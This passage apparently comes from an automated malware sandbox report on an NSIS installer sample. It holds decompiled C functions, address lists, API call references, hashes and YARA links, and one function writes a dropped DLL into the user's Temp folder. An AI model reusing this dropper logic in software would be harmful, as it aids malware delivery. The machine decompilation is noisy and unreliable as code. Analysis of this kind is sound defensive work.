								0x6f1d0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0xf:
								L11:
								__ecx = __ebp - 0x28;
								__edx =  *(__ebp + 8);
								E6F1DAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
								__ecx =  *(__ebp - 0x28);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								_push(__ecx);
								_push("uint3264=%ld => %p\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0x10:
								goto L46;
						}
					}
					return  *(_t246 + 0xc);
				}
			}






                                                                                              0x6f1d99d4
                                                                                              0x6f1d99d4
                                                                                              0x6f1d99d4
                                                                                              0x6f1d99e6
                                                                                              0x6f1d99ef
                                                                                              0x6f1d99fb
                                                                                              0x6f1d9a0e
                                                                                              0x6f1d9a1e
                                                                                              0x6f1d9a23
                                                                                              0x6f1d9a2c
                                                                                              0x6f1d9a38
                                                                                              0x6f1d9a3d
                                                                                              0x6f1d9a50
                                                                                              0x6f1d9a57
                                                                                              0x6f1d9a96
                                                                                              0x6f1d9a9b
                                                                                              0x6f1d9a59
                                                                                              0x6f1d9a62
                                                                                              0x6f1d9a85
                                                                                              0x6f1d9a64
                                                                                              0x6f1d9a72
                                                                                              0x6f1d9a72
                                                                                              0x6f1d9a88
                                                                                              0x6f1d9aa4
                                                                                              0x6f1d9aad
                                                                                              0x00000000
                                                                                              0x6f1d956c
                                                                                              0x6f1d9581
                                                                                              0x6f1d958a
                                                                                              0x6f1d9594
                                                                                              0x6f1d9ab7
                                                                                              0x6f1d9ac3
                                                                                              0x6f1d9ac8
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad1
                                                                                              0x6f1d959a
                                                                                              0x6f1d959d
                                                                                              0x6f1d95a4
                                                                                              0x00000000
                                                                                              0x6f1d95ab
                                                                                              0x6f1d95b5
                                                                                              0x6f1d95c0
                                                                                              0x6f1d95c7
                                                                                              0x6f1d95c8
                                                                                              0x6f1d95cd
                                                                                              0x6f1d95d2
                                                                                              0x6f1d95db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d95e3
                                                                                              0x6f1d95e5
                                                                                              0x6f1d95ed
                                                                                              0x6f1d95f5
                                                                                              0x6f1d95f8
                                                                                              0x6f1d95f9
                                                                                              0x6f1d95fc
                                                                                              0x6f1d95ff
                                                                                              0x6f1d9600
                                                                                              0x6f1d9605
                                                                                              0x6f1d960a
                                                                                              0x6f1d960d
                                                                                              0x6f1d9610
                                                                                              0x6f1d9613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9671
                                                                                              0x6f1d9673
                                                                                              0x6f1d967b
                                                                                              0x6f1d9683
                                                                                              0x6f1d9686
                                                                                              0x6f1d9687
                                                                                              0x6f1d968a
                                                                                              0x6f1d968c
                                                                                              0x6f1d968d
                                                                                              0x6f1d9692
                                                                                              0x6f1d9697
                                                                                              0x6f1d969a
                                                                                              0x6f1d969d
                                                                                              0x6f1d96a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9726
                                                                                              0x6f1d9728
                                                                                              0x6f1d972c
                                                                                              0x6f1d9730
                                                                                              0x6f1d9738
                                                                                              0x6f1d973b
                                                                                              0x6f1d973c
                                                                                              0x6f1d973f
                                                                                              0x6f1d9743
                                                                                              0x6f1d9746
                                                                                              0x6f1d974b
                                                                                              0x6f1d9750
                                                                                              0x6f1d9755
                                                                                              0x6f1d9758
                                                                                              0x6f1d975b
                                                                                              0x6f1d975e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9766
                                                                                              0x6f1d9768
                                                                                              0x6f1d9770
                                                                                              0x6f1d9778
                                                                                              0x6f1d977b
                                                                                              0x6f1d977c
                                                                                              0x6f1d977f
                                                                                              0x6f1d9782
                                                                                              0x6f1d9783
                                                                                              0x6f1d9785
                                                                                              0x6f1d9786
                                                                                              0x6f1d978b
                                                                                              0x6f1d978e
                                                                                              0x6f1d978f
                                                                                              0x6f1d9794
                                                                                              0x6f1d9799
                                                                                              0x6f1d979f
                                                                                              0x6f1d97a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d97aa
                                                                                              0x6f1d97ac
                                                                                              0x6f1d97b0
                                                                                              0x6f1d97b4
                                                                                              0x6f1d97bc
                                                                                              0x6f1d97bf
                                                                                              0x6f1d97c0
                                                                                              0x6f1d97c3
                                                                                              0x6f1d97c6
                                                                                              0x6f1d97ca
                                                                                              0x6f1d97cf
                                                                                              0x6f1d97d4
                                                                                              0x6f1d97d9
                                                                                              0x6f1d97dc
                                                                                              0x6f1d97df
                                                                                              0x6f1d97e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d961b
                                                                                              0x6f1d961d
                                                                                              0x6f1d9625
                                                                                              0x6f1d962d
                                                                                              0x6f1d9631
                                                                                              0x6f1d9634
                                                                                              0x6f1d9636
                                                                                              0x6f1d9639
                                                                                              0x6f1d963a
                                                                                              0x6f1d963d
                                                                                              0x6f1d963f
                                                                                              0x6f1d9640
                                                                                              0x6f1d9645
                                                                                              0x6f1d964a
                                                                                              0x6f1d964d
                                                                                              0x6f1d9656
                                                                                              0x6f1d9658
                                                                                              0x6f1d965d
                                                                                              0x6f1d965d
                                                                                              0x6f1d9663
                                                                                              0x6f1d9663
                                                                                              0x6f1d9666
                                                                                              0x6f1d9669
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97f1
                                                                                              0x6f1d97f4
                                                                                              0x6f1d97f5
                                                                                              0x6f1d97fa
                                                                                              0x6f1d97ff
                                                                                              0x6f1d9802
                                                                                              0x6f1d9805
                                                                                              0x6f1d980b
                                                                                              0x6f1d980d
                                                                                              0x6f1d9810
                                                                                              0x6f1d9810
                                                                                              0x6f1d9813
                                                                                              0x6f1d9816
                                                                                              0x6f1d981c
                                                                                              0x6f1d9823
                                                                                              0x6f1d9827
                                                                                              0x6f1d982c
                                                                                              0x6f1d982f
                                                                                              0x6f1d9832
                                                                                              0x6f1d9835
                                                                                              0x6f1d9838
                                                                                              0x6f1d983f
                                                                                              0x6f1d9860
                                                                                              0x6f1d9863
                                                                                              0x6f1d9869
                                                                                              0x6f1d9871
                                                                                              0x6f1d9876
                                                                                              0x6f1d9841
                                                                                              0x6f1d9841
                                                                                              0x6f1d9844
                                                                                              0x6f1d9847
                                                                                              0x6f1d984a
                                                                                              0x6f1d984d
                                                                                              0x6f1d9850
                                                                                              0x6f1d9857
                                                                                              0x6f1d9857
                                                                                              0x6f1d9879
                                                                                              0x6f1d987e
                                                                                              0x6f1d9882
                                                                                              0x6f1d9885
                                                                                              0x6f1d9888
                                                                                              0x6f1d988c
                                                                                              0x6f1d9890
                                                                                              0x6f1d9894
                                                                                              0x6f1d98a0
                                                                                              0x6f1d9935
                                                                                              0x6f1d9935
                                                                                              0x6f1d9938
                                                                                              0x6f1d993e
                                                                                              0x6f1d994e
                                                                                              0x6f1d9951
                                                                                              0x6f1d9940
                                                                                              0x6f1d9940
                                                                                              0x6f1d9943
                                                                                              0x6f1d9946
                                                                                              0x6f1d9946
                                                                                              0x6f1d9957
                                                                                              0x6f1d995a
                                                                                              0x00000000
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a9
                                                                                              0x6f1d98ac
                                                                                              0x6f1d98ad
                                                                                              0x6f1d98b0
                                                                                              0x6f1d98b2
                                                                                              0x6f1d98b8
                                                                                              0x6f1d98bb
                                                                                              0x6f1d98bc
                                                                                              0x6f1d98c1
                                                                                              0x6f1d98c6
                                                                                              0x6f1d98c9
                                                                                              0x6f1d98cc
                                                                                              0x6f1d98ce
                                                                                              0x6f1d98d1
                                                                                              0x6f1d98d4
                                                                                              0x6f1d98d7
                                                                                              0x6f1d98dd
                                                                                              0x6f1d98df
                                                                                              0x6f1d98e2
                                                                                              0x6f1d98e4
                                                                                              0x6f1d98e7
                                                                                              0x6f1d98ea
                                                                                              0x6f1d98ed
                                                                                              0x6f1d98f3
                                                                                              0x6f1d98f5
                                                                                              0x6f1d98f6
                                                                                              0x6f1d98fb
                                                                                              0x6f1d9900
                                                                                              0x6f1d9900
                                                                                              0x6f1d9903
                                                                                              0x6f1d9903
                                                                                              0x6f1d9907
                                                                                              0x6f1d990a
                                                                                              0x6f1d990d
                                                                                              0x6f1d9910
                                                                                              0x6f1d9913
                                                                                              0x6f1d9916
                                                                                              0x6f1d9919
                                                                                              0x6f1d991c
                                                                                              0x6f1d991f
                                                                                              0x6f1d9925
                                                                                              0x6f1d9929
                                                                                              0x6f1d992d
                                                                                              0x6f1d9932
                                                                                              0x00000000
                                                                                              0x6f1d9925
                                                                                              0x00000000
                                                                                              0x6f1d9962
                                                                                              0x6f1d9964
                                                                                              0x6f1d9968
                                                                                              0x6f1d996c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9979
                                                                                              0x6f1d997b
                                                                                              0x6f1d997f
                                                                                              0x6f1d9983
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9990
                                                                                              0x6f1d9992
                                                                                              0x6f1d999a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99ad
                                                                                              0x6f1d99b7
                                                                                              0x6f1d99bf
                                                                                              0x6f1d99c2
                                                                                              0x6f1d99c5
                                                                                              0x6f1d99c8
                                                                                              0x6f1d99cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9ab5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d96a8
                                                                                              0x6f1d96aa
                                                                                              0x6f1d96b2
                                                                                              0x6f1d96ba
                                                                                              0x6f1d96bd
                                                                                              0x6f1d96c0
                                                                                              0x6f1d96c2
                                                                                              0x6f1d96c5
                                                                                              0x6f1d96c6
                                                                                              0x6f1d96c9
                                                                                              0x6f1d96cb
                                                                                              0x6f1d96cc
                                                                                              0x6f1d96d1
                                                                                              0x6f1d96d6
                                                                                              0x6f1d96dc
                                                                                              0x6f1d96df
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d96e7
                                                                                              0x6f1d96e9
                                                                                              0x6f1d96ed
                                                                                              0x6f1d96f9
                                                                                              0x6f1d96fc
                                                                                              0x6f1d96ff
                                                                                              0x6f1d9701
                                                                                              0x6f1d9704
                                                                                              0x6f1d9705
                                                                                              0x6f1d9708
                                                                                              0x6f1d970a
                                                                                              0x6f1d970b
                                                                                              0x6f1d9710
                                                                                              0x6f1d9715
                                                                                              0x6f1d971b
                                                                                              0x6f1d971e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d95a4
                                                                                              0x6f1d9adf
                                                                                              0x6f1d9adf

                                                                                              APIs
                                                                                              Strings
                                                                                              • no unmarshaller for embedded type %02x, xrefs: 6F1D9A91
                                                                                              • embedded complex (size=%d) => %p, xrefs: 6F1D9A19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                              • API String ID: 2102423945-1287812044
                                                                                              • Opcode ID: 84780ae00972486c86fd2039dfd866eabb45a7375e373314c1419629633dca0c
                                                                                              • Instruction ID: 055725f03028416a7dcb25ce9f9ab022960fc5d6cb27450abd31b1fab1c21d37
                                                                                              • Opcode Fuzzy Hash: 84780ae00972486c86fd2039dfd866eabb45a7375e373314c1419629633dca0c
                                                                                              • Instruction Fuzzy Hash: 5D313CB5900249AFCB08CF98C8A1AEF7BB5BF89351F14C159F9559B244D334EA60CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D46B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D46B0(intOrPtr _a4, intOrPtr* _a8, void* _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				void* _t62;
				void* _t65;

				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 = _a12 + 1;
				_v12 = E6F1DF410(_a4,  &_a12);
				0x6f1d0000("unmarshalled discriminant %x\n", _v12);
				_t65 = _t62 + 0x24;
				_a12 =  *_a12 + _a12;
				_v8 =  *_a12;
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f1d0000(_a4, _v8 & 0x0000ffff);
				}
				if((_a16 & 0x000000ff) != 0) {
					E6F1E0730( *_a8, 0, _v8 & 0x0000ffff);
					_t65 = _t65 + 0xc;
				}
				return E6F1DED20(_a4, _a8, _v12, _a12, 0);
			}







                                                                                              0x6f1d46cc
                                                                                              0x6f1d46da
                                                                                              0x6f1d46ed
                                                                                              0x6f1d46f9
                                                                                              0x6f1d46fe
                                                                                              0x6f1d470a
                                                                                              0x6f1d4713
                                                                                              0x6f1d471d
                                                                                              0x6f1d4727
                                                                                              0x6f1d4727
                                                                                              0x6f1d4731
                                                                                              0x6f1d4745
                                                                                              0x6f1d4745
                                                                                              0x6f1d474d
                                                                                              0x6f1d475c
                                                                                              0x6f1d4761
                                                                                              0x6f1d4761
                                                                                              0x6f1d4781

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                              • API String ID: 2102423945-139691638
                                                                                              • Opcode ID: 06814a2a946486fb8a28402e3bef1e79f7d8c7eb43cdf98f69fb6242d3c32524
                                                                                              • Instruction ID: a8b3f783e29d95d359b8b756b96b5aba8ab2a7f96d9adf7d6ce98f7b557f48f8
                                                                                              • Opcode Fuzzy Hash: 06814a2a946486fb8a28402e3bef1e79f7d8c7eb43cdf98f69fb6242d3c32524
                                                                                              • Instruction Fuzzy Hash: 512162B5600249ABCB04CF64DC90EAF7BB9BF49345F048559FD198B245E731EA60CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}




                                                                                              0x00404c25
                                                                                              0x00404c4a
                                                                                              0x00404c6a
                                                                                              0x00404c6d
                                                                                              0x00404c70
                                                                                              0x00404c87
                                                                                              0x00404c8d
                                                                                              0x00404c94
                                                                                              0x00404c9b
                                                                                              0x00404ca2
                                                                                              0x00404ca7
                                                                                              0x00404cad
                                                                                              0x00000000
                                                                                              0x00404cbd
                                                                                              0x00404c57
                                                                                              0x00404caa
                                                                                              0x00404caa
                                                                                              0x00000000
                                                                                              0x00404caa
                                                                                              0x00404c63
                                                                                              0x00404c65
                                                                                              0x00000000
                                                                                              0x00404c65
                                                                                              0x00404c2b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404c32
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404C4F
                                                                                              • CallWindowProcA.USER32 ref: 00404CBD
                                                                                                • Part of subcall function 00403D29: SendMessageA.USER32 ref: 00403D3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                              • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                                                                              • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                              • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DAFA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6F1DAFD7
                                                                                              • pointer is the same as the buffer, xrefs: 6F1DAFFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                              • API String ID: 4104443479-2199830383
                                                                                              • Opcode ID: a03464d7cff85418a5e49547480990eda18758217e21b250ff1ec99b8c594918
                                                                                              • Instruction ID: c88f5f897ca36135a4312492c6f8e8c465d6ae5e9b01012d9dfd0f16af9d1595
                                                                                              • Opcode Fuzzy Hash: a03464d7cff85418a5e49547480990eda18758217e21b250ff1ec99b8c594918
                                                                                              • Instruction Fuzzy Hash: E011C8B9200209AFCB04CF44C891D5ABBB6BF88394F15C648FD494B346D731FAA1CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                              0x004024b0
                                                                                              0x004024b0
                                                                                              0x004024b3
                                                                                              0x004024ce
                                                                                              0x004024b5
                                                                                              0x004024b7
                                                                                              0x004024bc
                                                                                              0x004024c3
                                                                                              0x004024d5
                                                                                              0x0040264e
                                                                                              0x0040264e
                                                                                              0x004024db
                                                                                              0x004024ed
                                                                                              0x004015a6
                                                                                              0x004015a8
                                                                                              0x00000000
                                                                                              0x004015ae
                                                                                              0x004015a8
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll, xrefs: 004024BC, 004024E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FileWritelstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll
                                                                                              • API String ID: 427699356-1960073921
                                                                                              • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                              • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                                                                              • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                              • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                              0x00405466
                                                                                              0x00405470
                                                                                              0x00405472
                                                                                              0x00405479
                                                                                              0x00405481
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405481
                                                                                              0x00405483
                                                                                              0x00405488

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 0040546B
                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405479
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-1246513382
                                                                                              • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                              • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                                                                              • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                              • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                              0x00405583
                                                                                              0x00405585
                                                                                              0x004055ad
                                                                                              0x00405592
                                                                                              0x00405597
                                                                                              0x004055a2
                                                                                              0x00000000
                                                                                              0x004055bf
                                                                                              0x004055ab
                                                                                              0x004055ab
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
